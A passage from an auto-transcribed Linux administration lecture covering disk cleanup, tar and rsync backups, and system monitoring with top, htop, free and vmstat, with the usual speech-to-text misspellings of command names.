need to hold on to log files that long the way that you could do this is by using the journal CTL command and then remove the uh the stuff that is older than two weeks for example by using the vacuum time so this command removes Journal logs older than 2 weeks um and you can adjust the time frame as needed so you could do two days or one month or whatever and journal CTL will remove those items based on the time that they were in uh you can clean up packages by doing the pseudo AP clean or pseudo dnf clean all which will clear the package cache freeing up space that are used by downloaded package files that one’s pretty self-explanatory and then you can do a local Purge which would remove unnecessary localization files um in according to the local machine so uh The Purge command is kind of funny to me but uh it removes unnecessary localization files for languages that you don’t use so you got to install it first if it’s not already available and then you would run it and it would uh e Purge it would Purge all of the languages that aren’t being used from your local machine um we can do find and delete of large files so if it’s uh larger than 100 megabytes for example in this particular case you’re looking at the fine command which we’ve already kind of been introduced to and it’s looking inside of the root folder for the file type so type f would be a file that has a size of a 100 megabytes or larger and then once you find these files you can delete them if they’re no longer of use to you and then analyzing dis usage with GUI tools which are graphic user interface tools like Bob dis usage and analyzer on gnome or ker stat on KDE um and then you would have to install them obviously and then once you have them installed you can sort through your computer and browse the computer to find anything that would be larger than a certain size or anything that’s older than a certain period and remove all of those files and folders if they’re no longer applicable or at the very least transfer them to an external storage so in summary you can use a variety of different tools to clean up your disc um and just doing this regularly in a scheduled manner will help you avoid any kind of storage issues and so it could be done as easily as using the AP package manager and auto remove it could be done with using the dnf manager and doing Auto remove you can remove recursively anything that’s inside of the temp folder you can use Journal CTL with the vacuum time to 2 weeks to delete anything that’s older than 2 weeks or anything of that sort all right now we need to talk about backups and restoration strategies and one of the big pieces about this is going to be the command known as tar and tar is a command that is used to create archives the it’s an acronym for tape archive and it’s a command line utility to create and manipulate archive files um it compresses the multiple files into a singular archive file it can also work with directories as well um which makes it easier to store things and to transfer them to manage Backup so on and so forth it can uh support various methods for for example the gzip bzip and XZ which are it’s separate from the zip file uh ZIP command excuse me um which is another command that can compress uh data or compress files and directories into a singular uh ZIP file a compressed file um it is separate from that but it’s technically not considered uh creating a zip file it creates an archive file um so that’s I would say the key difference but I mean it does compress the multiple files into it so it does uh essentially the same uh activity it serves the same purpose as creating a zip file so to create an archive uh you would do it with the tar command and there’s a variety of options that we’ve attached to this so I’ll explain them in the next slide um and then you create the compressed file which would be this in this particular case and then this would be the path to the files that you want to compress so if we want to break this down the first portion of those options would be the C flag which is to create so it creates a new archive the Z flag compresses it into a gzip so a zip folder a gzip file V would be verbose meaning the files that are being processed are going to be displayed onto the screen so this is not necessarily uh it’s not necessary for the function of tar to work it’s just going to display onto the screen what’s actually being processed and how it’s going and then the F portion is specifying the output file name which in this particular case is backup. tar.gz so this is necessary for the function this is necessary for the function this is necessary for the function if you leave this out if you leave the- F portion out what it’s going to do is it’s going to create its own name and then you would have to rename it after the fact so if you just add the- F you can designate what you want the name of it to be and then the path to the file would be the actual file and directory that you want to be archived so in this particular case it’s just one path that’s been provided and then everything inside of this path is going to be archived into this backup. tar.gz uh compressed file right so you use- C to create – Z to turn it into a gzip and then- F to designate the name and then- V is just a verbos output so that it displays everything onto the screen as it’s being processed then you have the backup of these documents so for example again you’re creating another archive in this particular case but now it’s going to be a backup that is being created of the user documents so the exact pretty much the same exact command that we just ran in this particular case in this case right here except now we’ve actually given the path that we want in this particular case and it’s going to be it looks like this right so we’re creating a backup of the home user documents and it’s being placed into this particular backup file right here which is again same exact options that are being assigned to it and it’s creating a gzip file for us so if you want to extract the archive now you’re going to do uh a similar uh options here um the flags are a little bit different and the the very end right here where you actually create the the destination the path to destination also requires a flag for it as well so if we were to uh dis uh decipher that or if we were to what’s the word that I’m looking for not decipher um not split slice I’m drawing a blank but it it’ll come to me so if we were to break it down basically uh what we’re going to do is the first piece the instead of C we have X so instead of creating a file we’re now extracting a file so the first option the first flag is the X and then the Z Would to designate that we’re decompressing the archive using gzip so this would have to be a gz extension right here in order for this to work if it was a different type of an extension for this archive file you would use a different option inside of this so the Z represents gzip when meaning that we’re decompressing a gzip compressed file the V is still verbose to display everything that’s going on and then the F would specify the input file name which in this case would be the backup. tar and then we have the C for the directory meaning the destination directory for the extracted fil so everything here looks almost identical to creating an archive except in this case we’re extra in it and we’re going to use the X flag here to extract the Z is still the gzip and then the V would be verbose the file would be the name of the file that’s going to be extracted and then we’ve added this Capital C flag over here that would give us the path to the destination of where it’s going to be extracted to so um extracting the archive as an actual example here where we have the backup that we just created from the documents and then we’re going to designate the place that it’s going to be transferred into once it’s been extracted which is going to be the home user restore documents and this is essentially the same exact command that we just saw with actual content filled in the actual path has been filled in in this particular case and then the name of the backup file has also been filled in so if you want to list the contents of an archive you could use the tvf so V and F you should already be familiar with so V is going to be for verbos f is going to be to designate the file name in this case but then you’re using the T flag which stands for list so list T um so it’s going to list the contents of the archive without actually extracting the contents of the archive so we don’t have an actual breakdown of those commands um what we’re going to see in this particular case is that this is literally the closest thing to the breakdown of the command so you’re already familiar with V for verbos f is going to designate what the file is that you’re going to try to look at and then the T flag is going to list the options or list the contents of this particular archive file now if you want to exclude files from the archive then you’re going to use very similar set of commands here except there’s this last piece right here which is going to be the piece inside of this directory that you want to be excluded right so you want to Archive everything inside of this piece with with the exception so excluding this path so notice that path two files is still here so we’re still trying to uh archive this piece right here the only thing that we’re doing is that this exclude me portion is not going to be included in this archive file so you can actually create an archive and then exclude a certain portion of this directory from your overall archive that you’re creating so exclude is the uh the command here so– exclude and then you need to give it the full path of the directory or the file that you want to be excluded from this backup file that’s being created from this archive file that’s being created using tar so to append a file to an existing archive you can do this as well so you can do the r option to append now this unfortunately is not R in any way is doesn’t equal append or it does it’s not included in the word append so you kind of have to learn this one and kind of memorize this one or just save this right save this command for future use um if you don’t if you’re not going to get the the the documents or the the slideshow U from hack holic Anonymous I hope you’re creating your own file with these commands inside of it so at the very least I hope you’re doing that but again you can just come to the video at this portion and just look at the archiving function with tar so there’s a lot of different ways that you can come back and refer to this but anyway so we do have the V for verbos we have the F to designate what the file is going to be and then in this case we’re using the r flag to append something to this backup file right here to this uh archive file so it’ll append additional files to an existing archive and the r option stands for a pen so this is going to be our existing archive and then this is the path to the additional file that you want to be appended into this archive so you don’t this is actually very neat it’s very useful because um when you create a zip file you can’t append something into the zip file but you can do it using the tar command which is actually very handy cuz sometimes you want to just add things to an archive file without creating new archive files you know what I mean you just want to keep the same archive file and then just add something to that archive so for example um new versions of a log file inside of the VAR log directory instead of creating new archives you just keep adding those same log files as the time arrives you just add them to the same archive file so you could just have one archive file for the authentication log for example the off log you can have just one archive file for that and then anytime that you do a backup you just add the new archived file or the new log file that’s been created you just add it to the same authentication backup archive which is again it’s very very handy it’s very useful so this is an example that we have over here that that we’re now going to kind of go through to create a backup so it’s very similar to what you’ve already seen in this particular case we have all of the same flags as we had before and in this backup file we actually have the date that’s been attached to it to kind of give us an understanding of what this backup represents and then we have the documents folder that’s being backed up so backup of 1115 2024 and then it has all of the documents or all of the content of the user documents that’s going to be backed up inside of this file so very very handy little command and then now we have the extraction of that backup so same exact archive file except now we’re extracting it and we’re using the capital c flag over here to designate where we want it to be extracted to and the X flag right here to designate that we’re extracting instead of creating so the rest of it is exactly the same it’s a gzip file it’s verbos and then you’re designating the file name that you’re going to be working with and then it’s going to be extracted into this particular location which is going to be the new location for those restored documents and the third example that we have is to list the contents of that backup file so this should have probably been example number two where we list the contents of the backup file and then we extract the back backup file but T would represent list so you’re listing the contents of this backup file or this tar file this archive uh without extracting the contents of it and that is it so our summary here is that uh it’s obviously very versatile it’s very powerful as you just saw from the examples that we saw um by mastering just a few key commands you can efficiently back up and restore files and honestly create a lot of really good scripts because now that we know that we can append something using the r flag for example when you can append something to an existing archive file that means every time that that script runs and it could be a schedule task that you schedule with KRON tabs and cron jobs and every time that that backup file or that archive uh script runs it’s just going to append the contents of whatever it is that you’re trying to do inside of the same exact archive without creating a new archive file which is honestly I actually love that it’s very very useful it’s very handy and as I’m going through this I’m like okay well why am I not why haven’t I created a script for that so you better believe that I’m going to create a script that’s going to use the tar command to append the contents of my logs uh for my own machines inside of the same exact archive file which again is just super freaking handy so incremental backups that can happen with our sync will be our next piece so it’s a very useful versatile efficient utility for synchronizing files and directories between different locations uh it’s particularly well suited for backups because it transfers only modified files uh reducing the time and bandwidth that’s required for the operation so it essentially detects which files inside a given location have been modified and if they have been modified then it’ll back it up which is again very very useful so uh you have the key features here which are the incremental transfer so only modified portions of the files are transferred so think about what it means to sync something right so if there is one new addition or one new modification that’s been made it’s just going to get resynced it’s very similar to what happens when you have iCloud for example and your iCloud storage will detect any new additions that have been made to your phone’s contents and then it’ll back it up to your current cloud um and it won’t uh it won’t take everything that you previously had it’s only going to take the new additions that have been made into your phone and then just add those into your iCloud backup so it’s very very useful uh it only detects things that have been modified right it’s very versatile it can be used for local backups as well as remote backups over secure shell which is freaking badass uh it preserves file attributes so it maintains permissions time stamps and any other attributes that were originally created on the original file as it synchronizes to the new backup location so very very useful little tool so the basic command structure here is we have rsync with the AV flag and then this is the source location and then the destination directory so a to Archive and it enables archive mode preserves permissions Sim links everything else that’s the attribute for this Source directory and all of its contents and then verbos to provide a detailed output of the synchronization process onto your screen and then the source directory is the path to the source and then the destination would be the path to the destination so very simple command not complicated to understand at all and we’re just running our sync with the two flags right here you got to give it the source directory and then the destination directory and then it’s going to do exactly what it should um a basic sync as an example using actual directories here again same exact command with the the archive and the verbos flags attached to it now we’re just saying the home the documents from this particular user is going to go into the backup documents and that’s pretty much it syncing over SSH which is the the one that I’m most interested in um would be something that the flags the initial flags are staying the same so you still have the archive and the verbos flag but now you have this e flag for here for export I would say um that’s really the the thing that I would attribute the E2 um and it’s going to use the SSH um uh protocol to be able to transfer it and then Source directory and then you have something very similar to what we did with secure copy if you remember the instructions that we went through secure copy that you would have the user at the remote server which would probably be an IP address for example so you’d have the user at the remote IP address and then you have this colon and the path to the destination that this backup is going to take place once you run this okay you need to probably provide a password for this user unless you generated a key that has been uh uh attached to to the the key log not the key log I forget the the technical term but essentially it’s the storehouse of the local keys on your computer that would uh that would not require you to enter a password every time you did this so if you want to run this as a part of a scheduled script for example inside of your KRON jobs then you would definitely need to take the actions that we took when we generated keys so that you can have a passwordless authentication for SSH and then this would run every single time without needing the password to be entered for this particular user so that it can backup this directory inside of this destination so it’s not complicated to do the backup it’s actually quite easy you just need to designate that you’re going to use the SSH protocol and then you have to have the credentials and the location for where this is going to go and then if you have used a uh key based authentication method you you won’t be prompted to enter the password for this particular user and then from there it’ll just run like clockwork so syncing over SSH is a very very powerful tool and then this is it right here right so we have Alice at this particular IP address and then it’s going into the backup documents for uh this particular IP for the Alice user and then that’s it and this is assuming that we already have Alice’s key inside of our keyless authentication or not keyless passwordless authentication or we know Alice’s password so as we run this we would enter Alice’s password and then it would just back up everything inside of this location on Alice’s user profile inside of this particular server so very very useful little command is rsync so if you want to back up something with deletion so if you want to delete right it ensures that the destination directory mirrors The Source directory by deleting files from the destination that no longer exist in in the source this is very useful right so if for example uh you no longer need the contents that you deleted from the source so let’s say you had 100 pieces 100 files you had 100 files you have updated 50 of the files and you deleted 50 of the files okay this destination still has those original 100 because you already did one backup when you run this flag right here it’s going to sync these two destinations and all of the files that were deleted from The Source because you didn’t need them anymore are now also going to be deleted from the destination so it’s going to sync them and make sure that they match exactly and only the files that exist inside of the source are going to be the files that exist inside of the destination so it’s very very useful command and this is something that you can of course combine with these commands as well as if you want to run it with D SSH command you can combine all of those options together and just add this delete portion so that anything that would be duplicate or anything that no longer exists in this Source location will also be deleted from the destination location ensuring that you’re not holding on to old files that are no longer relevant so that’s very very useful so this is actually what it looks like using the delete command and some actual paths here so we have the home user documents and then the backup documents and of course it’s going to to synchron synchronize the contents of Home user documents with backup documents deleting any files in the destination that are not present in the source so deleting any files here that no longer exist in this particular location so here’s our example here so we have the rsync with the AV flag so we’re archiving and we’re going to have a verbos output and we’re taking the contents of this and we’re putting it inside of this Project’s backup folder we we have another example that is being done with the SSH protocol so we have to add the dash e flag here to designate that we want to export into SSH we’re taking the contents of the home user projects and we’re putting it on Alice’s profile on this particular server with the backup projects location and then we have the delete command that’s also being added to this and again this also could be added to this particular command as well right so you could have the av– delete and then- SSH so on and so forth and then that would ensure that the contents of here match this content so it would delete anything inside of this location that no longer exists in this location it deletes the stuff in the destination that are no longer in the source and that’s our destination that’s our source so very useful series of commands we have a couple of additional options in this uh location so we have the Dash progress D- progress which displays detailed progress information for each file during the transfer so it’s similar to verbose ex except I guess it’s showing you kind of like a percentage update we’ll be reviewing this as we go through our practical portion so you can actually see what this looks like but it’s going to display the progress as the transfer for each file is taking place during the overall transfer process and then we have The Preserve hard links command so this is the hard links portion right here which preserves hard links in the source directory so this location the hard links uh if you remember soft links are essentially uh shortcuts to a certain file or a command and a hard link is the duplicated version of that so if you have two files uh the hard link would be a duplicated version of the file whereas the soft link would just be a a shortcut that points to the or original file so in this case it’s preserving all of the hard links in this case which I mean uh assuming that uh you want to uh keep these things I don’t I personally don’t know why you would have to designate this maybe as a part of the sync process it sometimes might delete it but uh I would say include this in everything if you want to keep everything that is inside of the source directory and then delete whatever’s been deleted from the destination that’s all fine but just add this I would say to every single time that you run rsync to ensure that it’s keeping all of the hard links inside of the source directory that that feels like it’s an important command that should be run every single time then we have compressing of the data during transfer this is another thing that’s very very useful so the Z option compresses the file uh data during the transfer to reduce bandwidth usage and to reduce the space that is taken inside of the destination directory as you transfer for the file so this would this feels like another uh option that would happen frequently especially if you’re not going to be transferring this stuff back and you’re mostly doing this for backup so if you’re not going to do regular access of the destination directory and you’re just doing this to back up your stuff for Recovery purposes for example then you would add the Z option to compress the data so that it can take less space as well as reduce the amount of data that’s being used for the transfer so the bandwidth usage that’s being used during the transfer that would be another one of those flags that I would say should be ran every single time unless you’re going to access the contents of the destination folder while you get to the to that location or you’re going to use it from a different computer or something like that and you want to have uh uncompressed files I guess or like live type of files that haven’t been compressed so that they’re easily accessible and you don’t have to go through the extra step of decompressing them without uh with uh decompressing them and get access to them essentially so you don’t want to decompress them and you just want to access them essentially but for the most part if it’s just being for backup purposes so for you know future recovery in case anything happens and your system crashes or something I would say that you should compress all of that data so in summary uh our sync is actually very useful to do incremental backups because what it’s going to do is going to update this uh the destination location only with the changes that have been made in the source location it’s flexible it has a range of options that make it suitable for a variety of backup scenarios both locally and over the network do using something like SSH you have our basic sync command that we’ve gone through we have the SSH sync command that we’ve gone through and then we have the delete version of the command that’s also very useful that will delete anything inside the destination that no longer exists in the source very very useful tool which is rsync which brings us to system performance monitoring so monitoring the CPU memory and the processes that are running using a tool called top now top and htop both uh perform essentially the same function so what they do is they list the the processes that are currently running the services that are currently running on your computer and they show you how much CPU each one of those things is using how much memory or Ram each one of those things are using and the pids and certain details about each one of those processes and it’s a dynamic list meaning that it updates in real time and if something is taking up more memory than the next thing it’ll go up uh in the list and it’s a live list right it’s not something that is just stagnant and then you run at once and you just get this list uh with the line items saying exactly the same so it’s a live uh environment type of a monitoring so what it looks like is you just literally run top and you press enter and it provides the dynamic realtime view of what’s going on in the system so the processes that are running on the system and the amount of resources that each one of them is using uh this is included in most Unix operating systems and Linux obviously and it’s actually on Mac OS as well so if you just run top and press enter it’ll actually show you all the commands that are running on Mac OS in a live environment and how much resource each one of them is used using uh this is used all the time for system administration as well as security so if you just want to see if like a computer slows down or if a Server slows down drastically and you don’t know exactly what’s going on you would run the top command to see what is running and how much resource those things are taking and more often than not you kind of reverse engineer not based on the name of the service but based on how much resource it’s using so if it’s using a lot of the Ram or if it’s using a lot of the CPU then you can say okay well this seems kind of funky what is this particular process and then you start doing the rest of your investigation that way the command itself is literally press top and press enter and it’ll start displaying the output and it’s updated regularly it typically goes 1 second at a time but then you can change it so that the incremental uh updates are done by 5 Seconds or 10 seconds or something like that if the the 1 second update is a little bit too much which I think it has in my opinion it is too much cuz it’s it’s kind of hard to notice what the commands are so you can change it to a 5-second update and it’ll change or it’ll update itself continuously but it’ll do it every 5 Seconds instead of every second um when you navigate this so This is actually something very useful to understand so uh you can use a lot of different commands to interact with it while it’s running so when you press top or you type top and you press enter the output on the screen is just going to stay there until you exit it so what you want to do is you want to interact with the output put as it’s going around so if you press P while top is running it’s going to sort everything by CPU usage so P CPU P CPU so you press p and then it’ll sort everything by the CPU usage making it easy to identify what’s going on and what’s consuming the most CPU if you run M you would be sorting by memory so that one’s very easy to understand so another way that we can look at CPU would be p for processing so processing would be the the uh sorting mechanism when you use P so it’s going to use CPU processing power so Central Processing Unit think about it like that so the central processing unit so P would be for processing M is for memory so the ram random access memory so it’s going to sort by the RAM usage and how much RAM the the process is currently using um if you press k then you would be be ordering top to kill a process so you would press K and then it’s going to ask you uh or it’s going to give you the option to enter the P of the process that you want to kill so let’s say that using P and M you have determined that there’s one specific process that’s taking up a lot of uh resources and now you want to kill that process so you would press K and then you would provide the PID for that process so that it will be killed automatically or immediately it’ll be killed killed by your system and hopefully it will not take any more resources from you and it will just kill sometimes you may need to do Force kill which is a different command but just K by itself it will kill a process if you want to quit top you just simply press q and then it’ll exit the top interface so remember when you enter tops you type in top press enter you’re now inside an interface that is going to be interactable so you can interact with that interface once you’re done interacting with it and customizing the display and getting the information that you need killing a process doing whatever you need to do you would need to exit top and in the way that you do that is by pressing q and then it’ll exit the top interface the next one is H top which is the enhanced version of top that offers a more userfriendly colorful and interactive interface but it essentially provides the same uh processing or it provides the same service and utility that top does except it’s just a little bit more user friendly it’s colorful instead of just a bunch bunch of black and white entries on the screen you actually get color coding that happens with the entries on the screen um and it improves the user friendliness of it so uh you would run install htop if you don’t have it so it’s a pseudo command so pseudo AP install htop or pseudo dnf install htop because it does not come pre-installed so top comes pre-installed with Linux but if you wanted to include if you wanted to install htop you would need to actually install it and then you would run it according to the various commands so for example run htop press enter and then it’ll start the tool and it’s very similar to the interaction that you would have with the top tool so it provides the enhanced user experience with easy navigation if you want to view processes um or viewing the processes would be the main screen and it gives you the list of processes similar to top but with more detailed and accessible information um if you wanted to sort by columns you would do F6 and this don’t know what the the replacement for this is if you don’t have F6 on your uh computer so or on your keyboard I should say so what I’m going to do is I’m going to actually get that information for you now okay so thankfully it’s actually fairly useful so if you don’t have the F6 key on your columns or in your keyboard for example to organize the columns then what you do is just use the left and right arrow keys to move through the columns at the top of the interface and then once you’ve landed or highlighted the column that you want to sort you press enter and that’s it so uh it’s fairly simple fairly straightforward to organize the columns if you don’t have the F6 key on your keyboard which I do realize that not every keyboard has that so a lot of keyboards do my current keyboard the Bluetooth keyboard that I have does but when I’m looking at my MacBook the MacBook does not have F6 on it in uh in inherently what you can do is you can press the um FN key um which brings up the F keys right above my numerical numbers and then I can use the F keys that way but sometimes you don’t even have that option and you have to try to work a way around it so if you have the F Keys that’s amazing if you don’t have them this is how you do it you just use the left and right arrow keys and then you press enter once you’ve highlighted the column that you want and then it’ll organize that column for you so if we you want to kill a process in HTP you would select the process using the arrow keys and then press F9 in this particular case and the signal to send this whoops the uh the signal to send in this particular case would be Sig term which is the default uh which is going to terminate it’s the signal to terminate and it sends the process using the uh it kills the process excuse me using the F9 key so it allows you to interactively terminate the process now I need to find that out how to do this if you don’t have the F keys on your keyboard so let me go get that information for you if you don’t have the F9 key to terminate the process you can kill it using the K key so use the arrow keys to move up and down the list to highlight the process that you want to kill and then you press the K key the lowercase version of the K key to open the action menu which is an alternative to the shortcut to uh or this is an alternative shortcut to F9 and then you select the the the actual option or the the the process that you want to kill and after you’ve pressed that you’ll see a list of signals that you can end the process the default signal to terminate process is Sig term in this particular case which is signal number 15 for terminate and then you press enter to send sck term which will attempt to gracefully terminate the process if you can’t do that then you would force kill which would work with the Sig kill uh which is signal number nine to forcefully kill the process so Sig terminate is signal number 15 and it’s going to attempt to gracefully kill the process but if it’s not killing and if it’s not working or if it’s not dying so to speak then you can forcefully kill the process by using the Sig kill which is signal number nine and then boom you are done we have the F3 option which is the option to search for a process and this essentially allows you to enter the name or part of the name of a process that you want to search for and that way you’ll be able to find it and then if you need to kill it or you know Force kill it or get other information about it you can go ahead and do it that way so now we need to find out what the substitute the alternative for F3 is if you don’t have the F3 key then you can use the forward slash as an alternative so you press the for/ key it’s going to open the search prompt at the bottom of the interface and then you would enter the process name or part of the process name that you want to search for press enter and then you can use the N key to move to the next match if there are multiple instances of the search term and that way you can search for processes by name if you don’t have the F3 key so there we go now we have the alternative to the F3 key next would be quitting htop which in this particular case would be done with the F10 key but then I’m going to find of course the option for you in case you don’t have the F10 key and this one is a exactly the way that top worked as well so you just press q and you press q and while it’s open this will immediately exit the htop application so if you don’t have F10 you just press q and then you are good to go so in summary both top and htop are very useful tools for monitoring system performance each of them have their own unique strengths the provided strength or the strength for top is that it provides a basic yet powerful real-time view of the processes and resource usage you have command commands like P to sort by CPU commands like M to sort by memory for navigation you can quit it using Q htop is a userfriendly version of uh top and it has enhanced features for example interactive Process Management and intuitive search navigation and you can do those with either the F Keys as we saw or by using the arrow keys or the various keyboard shortcuts that you have you can use F9 to kill a process and F3 to search for processes or you can use the the various um options that we actually had to either kill or forcefully kill something and then F3 would be the forward slash to be able to search for something and then Q would be to quit it so on and so forth so uh it still uh essentially offers the same usage that top does except it’s more user friendly because it does provide color coding and the responses and the output that you get and then you can interact with the results a little bit better and you have more options to interact with the results so um that is it for top and H top and now we can move on to free free is a simple and another powerful command line utility that displays information about the systems memory usage including both physical memory and swap space um it’s vital for monitoring system performance and diagnosing memory related issues so the command itself would be free Dash and the DH option stands for human readable so it formats the output in a way that it’s easier to read using uh units like kilobytes megabytes or gigabytes so this is an example out put for example an example output for example welcome to the Department of redundancy Department um so in this case we have ran free H and then we see that we have the memory usage or the total memory that’s available in our uh RAM as well as the swap space and it says that there’s been 3 gbes that’s been that is currently being used by the RAM and then there’s 8 gabt that’s free there’s 239 megabytes that’s shared there’s the buff and cache that’s at 4 GB and then your total actual available after all of these things are considered are 11 GB and then there’s nothing that’s being used inside of the swap so that one is all good the breakdown that we just see just to kind of give you another bre we’ve actually kind of reviewed this already but we’re going to review it one more time because we are now in the troubleshooting section of the the training series but this is a repeated training cuz we did go over this uh earlier in our training Series so um you’ve probably noticed that there are repetitions of various Concepts that we’ve gone through and we’ve looked at them at least twice and this mainly because the fact that they are relevant for a uh multiple amount of things so it’s not just for one use so free can be used for troubleshooting and it can also be used for swap monitoring and memory monitoring in the context of partitioning and file systems so you can be looking you can be using the same tool to serve multiple purposes as we’ve established so the total amount of memory or swap space the used amount the free amount the shared amount of memory that’s being used by the temporary file system the buffering and the cache so the memory that’s been used by the buffer or the cache and the final available memory after all of those things are considered uh without the swap space if you want to check the memory as an example and this is just another uh usage of it but it’s essentially the same command that you’re running just different output results that we have in this case and so the total would be 8 GB 2 GB that are used free or 500 megabytes are shared there’s 1 GB dedicated to the buffer and the cache and then the total available after all of these things are considered would be 6 GB and so this is just checking the memory usage as an example if you wanted to um monitor what’s going on in real time this is a very useful command that we didn’t cover before so so what you’re going to do is you’re going to use the watch command and then the N1 represents every second so if you did N5 it would be every 5 seconds and so on and so forth so you’re going to use the watch command and then run free H every single uh second essentially so this is a separate command from free this is not something that uh is included under the free AG tool so the watch command is by itself and you can apply it to a variety of different command line tools so we have watch- N1 which would say I want you to watch this output every 1 second which would essentially Run free H every second providing a real time version of the output so it’s kind of like running top except when top updates itself now we’ve kind of cheated the system and we’re running free H every second so that we can watch the output of this command every second providing a realtime version of free H for ourselves if you wanted to look at the memory information you can concatenate use a cat command against the process mem info path and this is not part of free but it is detailed information about memory usage directly from the file system itself so from the proc file system so this technically should not fall under free but it was incl uded in the course content and so this is how we’re going to look at it so you can run the cat command and concatenate the content of this particular file which will display detailed information about memory usage that’s directly from the actual process file system which will act similar to the the results that you would get from free free- m displays memory in megabytes Das K would display memory in kilobytes and Das G would display memory in gigabytes in my opinion you should just just do free Dash because it will associate it’ll kind of determine by itself what the best measurement um would be and then it would provide you that measurement in the associated metric so if it’s less than a gigabyte it would give it to you in megabytes if it’s less than a megabyte it would give it to you in kilobytes and so on and so forth you don’t need to necessarily run either one of these things but if you wanted to you could so now you know k for kilobytes M for megabytes and G for gigabytes I was going to say gigabytes G for gigabytes if you want to display the output specifically in those measurements we have free dashb which is the option that displays memory in bytes so it doesn’t even go in kilobytes it’ll go in the number of bytes so that’s the smallest uh form of measurement that we can feed into free free- l would include statistics about low and high memory uh usage so low and high memory statistics and then as a summary we have all of these uh commands just kind of output for you it’s basically a command that’s used uh it’s a very straightforward and essential uh tool for monitoring memory and swap usage on a system if you use the- H option it provides human readable output which essentially gives you the measurements in what it thinks are the best measurement uh uh parameters in the measurement um man I’m drawn a blank again today it’s kind of it’s weird the metrics I guess I should say uh it will give you the human readable format in what it determines to be the best way to measure something so kilobyte gigabyte megabyte so on and so forth and then it’ll also give you the free the used the shared the buffer cache total memory and available memory after all things are considered uh you would run free- for that if you wanted to do realtime monitoring you would do watch N1 so that it gives you a 1 second repetition of this command so it’ll run free H every single second and You’ be able to see kind of a live update for that and then you can run the concatenate or the cat command um on the particular M info file so that you can get detailed memory information which is not necessarily a part of the free command but it kind of falls into the overall conversation that we’ve had where we’re run with top and htop and of course now free VM stat is another tool so it stands for virtual memory statistics and it’s another tool that helps you look at these system statistics like memory usage and CPU performance and input output operations as well so it helps the administrator which is you Monitor and troubleshoot system performance effectively so you would essentially run all of these commands uh to get a variety of different information or to try to see if there’s something that maybe was not caught by htop for example and you were able to find it with VM stats so uh the basic command would would be VM stat 1 and five so the first one is the data every second being populated onto the screen for five iterations so the very first one would be a live count every second and then it’s going to iterate five times so you will get five entries printed onto the screen and then you just get the snapshot of the system activity over the specified interval so this is what it would potentially look like right so you have VM stat5 and then this is the structured in several columns so on and so forth so we have the processes itself you have the memory the swap the input output and the system itself and then the CPU that’s being used used and then you have all of this data that’s associated to every single one of those things but you kind of do see that there is like an overall column that’s associated with this so under memory we have the swap memory we have the free we have the buffer and we have the cache that’s being used under the swap space right here you have swap in or swap out that’s nothing being used in there you have the input output put so basic input basic output you have two that’s being input you have 15 output uh processes that are working you have the system itself incrementally the uh the in and the Cs I have to I think we have it on the next slide that it actually breaks down and then you have the CPU usage as well that gives you the data that is being used by the CPU so this these are the key Fields as we have them here so we have the procs uh column that we saw at the very beginning right here so we have the proc column the r represents the number of processes that are waiting for the runtime so these are runnable processes the B represents the number of processes in interruptible sleep so they’ve been blocked right so that’s what procs is and that’s what R&B stand for under procs memory would be swap D so the amount of virtual memory that’s been used which is the swap space you have the free memory the free amount of idle memory you have the buffer memory the amount of uh memory that’s being used as buffers and then you have the cache which is the amount of memory that’s being used as the cach a then you have the swap column which has the SI ands so so the memory that’s swapped in from the disc in kilobytes you have the memory that is swapped out to the dis in kilobytes so swapped in from the memory so you have the random access memory that can’t handle anything more than 8 gbt for example so when it goes into 8.1 that 0.1 is going to be swapped in from the disc and if there’s anything that’s being swapped out of the memory to the dis so that it’s being used by the disk that would be essentially the reverse of what I just mentioned then you have IO which is for input output so you have bi for the blocks received from the Block device which is in so it’s coming in blocks per second so this is the input that’s coming in in blocks and then you have the blocks that are being sent to a block device which is the going in blocks per second and then you have have the system itself so you have the in and the Cs so the number of interrupts per second including the clock itself and then you have the number of context switches per second which means you’re switching from the text editor to the internet browser and you’re switching from the internet browser to a video player and so on and so forth so what you’re making switches between different applications or different processes that’s what’s happening per second and of course the number of interrupts that are going on per second and then finally we have the CPU portion which gives us the ussy wst so the US would be the time spent running non-kernel code so this is the user time running non kernel code so this is the stuff that’s being done by the user itself the SI would be the time running kernel code so this is stuff that’s being run by the system by the kernel in the background you have Idol time the time that’s been spent on Idol time spent waiting for input or output which is I I guess a little bit different than idle cuz idle would be there’s absolutely nothing going on uh wait time for input output would be the computer is up it’s not asleep it’s not an idol or hibernation or anything but it’s still waiting for something to happen and then St would be time stolen from a virtual machine so just to clarify this for you cuz it is something that was a little bit above my head as well so when you see time stolen from vmstat it refers to the CPU steel time CPU steel time is the percentage of time that a virtual CPU within a virtual machine is waiting for resources because the hypervisor is allocating those resources to another virtual machine on the same physical host so it’s the time when your vm’s vcpu is involuntarily idle because it can’t get the necessary CPU from the physical machine so you have a physical host that physical host has two VMS on it two virtual machines on it and each one of those virtual machines is requiring a certain amount of CPU a certain amount of processing power and so if the CPU is not uh if there isn’t enough CPU then you can’t allocate to both of the machines and one of the machines is taking a lot of the processing power then the second machine is getting its processing time stolen so the steel time means that the processing power the processing time has been stolen from one virtual machine because another virtual machine is overclocking and it’s taking too much so it happens because the hypervisor is managing multiple VMS and has to distribute the physical CPU resources among them if there are more VMS or higher CPU demand than the physical host can handle some VMS may experience CPU steel time so an example would be to just run VM Stat one and so we already established that the first number that we feed it would just be the amount of seconds that it waits before it refreshes the data so it’s just going to continually update the system performance data every second until it’s interrupted using the control C to stop if we were to do one and then give the second number as 10 then it would repeat this iteration 10 times and then it would just automatically stop by itself if you ran VM stat it’s just a single snapshot so it’s not going to repeat itself it’s just going to give you one snapshot of the system performance at the moment that you ran that command and then this is what we see right here so it’s going to update itself every 5 seconds for 10 increments so it’s going to or yeah for 10 increments so it’s going to update itself every 5 Seconds 10 times displaying the performance data for 10 iterations that’s what I was looking for not increments it’s going to do this 10 iterations um every 5 seconds and this is our summary for VM stat so another essential tool monitoring and analyzing system performance provides detailed statistics on CPU memory and IO operations input output operations when you understand and utilize it administrators can effectively identify and troubleshoot system performance issues so this would be used in conjunction with top htop vmstat free so on and so forth these would be on your Suite of tools it would be in Your Arsenal of tools when you’re trying to troubleshoot system resources uh for example the amount of C CPU that’s being used the amount of ram that’s being used the amount of uh processes that are running and how much each one of those processes is taking so uh as you saw you get different results from each one of these tools so it gives you a little bit of uh it gives you more context to what’s going on within any given machine so that you can figure out overall what’s going on vmstat as the name implies is going to the virtual machine virtual machine statistics free would give you all the free space that’s available uh top would give you the uh processes that are running and the amount of uh memory or Ram that they’re using so all of these things serve a different purpose and they can be used in conjunction with each other to give you a full picture a great idea of what’s going on inside of your computer’s environment or your Network’s environment all right now we 